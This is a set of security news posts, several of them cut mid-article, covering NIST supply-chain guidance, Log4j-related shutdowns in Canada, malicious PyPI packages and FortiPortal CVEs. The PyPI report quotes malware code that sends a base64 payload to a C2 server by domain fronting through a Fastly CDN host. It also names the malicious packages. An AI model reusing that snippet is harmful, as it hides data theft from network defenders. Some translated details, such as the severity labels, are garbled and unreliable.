The document, titled “Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations”, invites buyers and end users of digital hardware, software, and services to conduct due diligence on the origin and security of components of a digital/technology product.

Supply chain attacks have become one of the most dangerous hacking variants, as they allow threat actors to compromise multiple devices at once, in addition to exploiting vulnerabilities in widely used components. Just remember the SolarWinds attack, which impacted thousands of organizations worldwide.

For Ilkka Turunen, software supply chain security specialist at Sonatype, these measures are important to substantially improve the security of organizations: “This document outlines fundamental best practices, such as generating software bills of materials (SBOM), as well as describing the maintenance activities necessary to maintain effective security practices in the supply chain.”

The researcher adds that software risk mitigation begins with understanding how the use of managed and unmanaged software occurs in an organization, in addition to the progressive mitigation of those risks at the vendor level and with the constant participation of customers.

On the other hand, Cequence Security experts recently alerted the cybersecurity community about the persistence of attacks exploiting flaws such as Log4Shell, discovered a few months ago and that allows abusing the Apache Log4j login utility, considered omnipresent.

A new wave of attacks, identified as LoNg4j, demonstrates the interaction between modern enterprise IT infrastructure and the digital supply chain, spreading across all kinds of applications and creating a critical attack vector in case any vulnerability is exploited.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post NIST updates the Cybersecurity Supply Chain Risk Management Guidance (C-SCRM) in Response to Executive Order Signed by President Biden appeared first on Information Security Newspaper | Hacking News.

The official assures that so far no exploitation attempts have been detected in government platforms, so the measure is completely preventive: “The risk is critical and according to the new protocols of the head of IT, we must close the vulnerable systems,” says Caire.

The risk is associated with a critical vulnerability in the Apache Log4j log library. Because most Quebec government websites use this tool, it was decided to discontinue its use temporarily, so they will be available again until the flaws in Log4j are addressed. Most vulnerable websites are quite unused, so authorities expect the outage to have minimal impact on the user experience.

Detecting this flaw is a relatively simple process, although depending on how system administrators address these issues the process could take a few days.

In this regard, cybersecurity specialist Eric Parent recommends adopting a systemic approach to address this class of vulnerabilities and thus minimize the risk of exploitation: “We have identified various threat actors exploiting this vulnerability, so it is better to be prepared.” The researcher concludes by mentioning that the best security recommendation is to shut down everything and restart the systems when the risk passes.

Other organizations have warned about this security risk; in recent days, multiple websites frequented by users of the popular video game Minecraft warned about the exploitation of this vulnerability, which could put at risk the enthusiasts of this video game.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post Canada shuts down 4,000 government websites fearing cyberattacks exploiting a critical vulnerability in Log4j appeared first on Information Security Newspaper | Hacking News.

The list of malicious packages detected in this research is shown below:

• importantpackage / important-package
• pptest
• ipboards
• owlmoon
• DiscordSafety
• trrfab
• 10Cent10/10Cent11
• yandex-yt
• yiffparty

Among these packages, experts note that “importantpackage”,” “10Cent10” and “10Cent11” seem to establish an inverse layer on the compromised machine. In addition, “importantpackage” abuses the TLS CDN termination for data theft, in addition to using Fastly CDN to hide malicious communications with the C&C server.

According to the report, the communication code for this malware is:

url = “https://pypi.python.org” + “/images” + “?” + “guid=” + b64_payload

r = request.Request(url, headers = {‘Host’: “psec.forward.io.global.prod.fastly.net”})

The researchers note that this code causes an HTTPS request to be sent to pypi.python.org which is subsequently redirected by the CDN as an HTTP request to the C2 server psec.forward.io.global.prod.fastly.net.

The dependency confusion technique involves loading contaminated components that have the same name as legitimate internal private packages, but with a higher version and uploaded to public repositories. This technique is really good for tricking package managers into downloading and installing malicious modules.

The researchers conclude by mentioning that while this is an attack similar to other hacking techniques, it does give threat actors a way to act stealthily, plus it could function as the prelude to subsequent attacks.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post Researchers find 11 malicious Python packages in the PyPI repository that can steal access tokens, passwords and create backdoors appeared first on Information Security Newspaper | Hacking News.

Below is a brief description of the reported flaws, in addition to their tracking keys and score assigned by the Common Vulnerability Scoring System (CVSS).

CVE-2021-36176: The improper sanitization of user-supplied data in both the customer and provider interfaces would allow remote threat actors to send specially crafted links to target users and run arbitrary HTML and scripts code in users’ browsers.

This is a low severity flaw and received a CVSS score of 5.3/10.

CVE-2021-32595: The affected application does not properly control consumption of internal resources in the web interface, which would allow remote malicious hackers to trigger a denial of service (DoS) condition.

This is a medium severity flaw and received a CVSS score of 6.7/10.

Experts mention that the flaws reside in the following versions of FortiPortal: 4.0.0, 4.0.1, 4.0.2, 4.0.3, 4.0.4, 4.1.1, 4.1.2, 4.2.1, 4.2.2, 5.0.0, 5.0.1, 5.0.2, 5.0.3, 5.1.0, 5.1.1, 5.1.2, 5.2.0, 5.2.1, 5.2.2, 5.2.3, 5.2.4, 5.2.5, 5.3.0, 5.3.1, 5.3.2, 5.3.3, 5.3.4, 5.3.5, 6.0.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4 & 6.0.5.

Cybersecurity specialists recommend affected implementations’ admins to install the last updates as soon as possible to mitigate the exploitation risk.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

The post 2 critical vulnerabilities in Fortinet FortiPortal appeared first on Information Security Newspaper | Hacking News.